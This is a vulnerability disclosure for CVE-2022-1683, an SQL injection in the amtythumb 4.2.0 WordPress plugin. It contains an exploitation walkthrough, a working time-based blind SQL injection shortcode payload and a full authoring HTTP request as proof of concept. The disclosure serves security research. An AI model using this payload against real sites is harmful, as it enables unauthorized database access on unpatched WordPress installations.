amtythumb 4.2.0 WordPress plugin SQL injection

Vulnerability Metadata


Key Value
Date of Disclosure May 09 2022
Affected Software amtythumb
Affected Software Type WordPress plugin
Version 4.2.0
Weakness SQL Injection
CWE ID CWE-89
CVE ID CVE-2022-1683
CVSS 3.x Base Score 8.8
CVSS 2.0 Base Score 6.5
Reporter Daniel Krohmer, Shi Chen
Reporter Contact daniel.krohmer@iese.fraunhofer.de
Link to Affected Software https://wordpress.org/plugins/amtythumb
Link to Vulnerability DB https://nvd.nist.gov/vuln/detail/CVE-2022-1683

Vulnerability Description


The id query parameter in amtythumb 4.2.0 is vulnerable to SQL injection. An authenticated attacker may embed a shortcode to persist an arbitrary SQL query and subsequently trigger the vulnerability without any authentication.

Exploitation Guide


Login with at least author privileges or higher.

amtythumb_step-1.png

Add a new post.

amtythumb_step-2.png

Add the respective shortcode and append the exploit right after the id, which is the vulnerable data parameter. Then, click on Publish.

amtythumb_step-3.png

Clicking on publish persists the exploit in the backend. The request looks like the following:

amtythumb_step-4.png

The exploit can be triggered by simply calling the main page of the blog containing the previously created blog post. For this, no authentication is necessary. If the exploit was successful, the page will be loaded with 5 seconds delay.

amtythumb_step-5.png

It might be necessary to clear the cache if re-running the exploit is desired. For this, select Clear Image cache [soft] in the bulk menu and click on submit

amtythumb_step-6.png

In the code, the vulnerability is triggered by unsanitized user input of id at lines 18-26 in ./amtyThumb.php. Subsequently, the id parameter is passed on through a few function calls.

amtythumb_step-7.png

Finally, the database call ultimately leading to SQL injection can be found at line 32 in ./supporting_function.php.

amtythumb_step-8.png

Exploit Payload


Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.

The SQL injection can be persisted by embedding the following shortcode into a WordPress blog post:

[amtyThumbOnly percent=50 post_id=1/**/AND/**/(SELECT/**/7741/**/FROM/**/(SELECT(SLEEP(5)))hlAf)]

By Publishing the post, the following request is triggered:

POST /wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/post-new.php?wp-post-new-reload=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 1177
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=author%7C1651856944%7CtP8UZwIAG7oH14wJtoNuNmTbq3WxPHnqLBoe9fo1En9%7C5c7fc7d8016bda32b33f644c9c05ac5691021ef5cecdb5cf8de4b6de23e7f11f; wp-saving-post=370-check; XDEBUG_SESSION=netbeans-xdebug; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=author%7C1651856944%7CtP8UZwIAG7oH14wJtoNuNmTbq3WxPHnqLBoe9fo1En9%7Cca6e47aeee6fa0065fcd2fc762d7f9568ac87de005f9f13b84c405fb2b87d891; wp-settings-2=editor%3Dhtml%26ampunfold%3D1%26ampmfold%3Do%26mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-2=1651684296
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

_wpnonce=6c4925a28c&_wp_http_referer=%2Fwp-admin%2Fpost-new.php&user_ID=2&action=editpost&originalaction=editpost&post_author=2&post_type=post&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwp-admin%2Fedit.php&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwp-admin%2Fedit.php&auto_draft=&post_ID=370&meta-box-order-nonce=1fb73cad96&closedpostboxesnonce=fea321c177&post_title=&samplepermalinknonce=44f654d983&content=%5BamtyThumbOnly+percent%3D50+post_id%3D1%2F**%2FAND%2F**%2F%28SELECT%2F**%2F7741%2F**%2FFROM%2F**%2F%28SELECT%28SLEEP%285%29%29%29hlAf%29%5D&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=05&jj=04&aa=2022&hh=17&mn=13&ss=01&hidden_mm=05&cur_mm=05&hidden_jj=04&cur_jj=04&hidden_aa=2022&cur_aa=2022&hidden_hh=17&cur_hh=17&hidden_mn=13&cur_mn=13&original_publish=Publish&publish=Publish&post_category%5B%5D=0&tax_input%5Bpost_tag%5D=&newtag%5Bpost_tag%5D=&_thumbnail_id=-1&excerpt=&trackback_url=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=f1c029c042&advanced_view=1&comment_status=open&ping_status=open&post_name=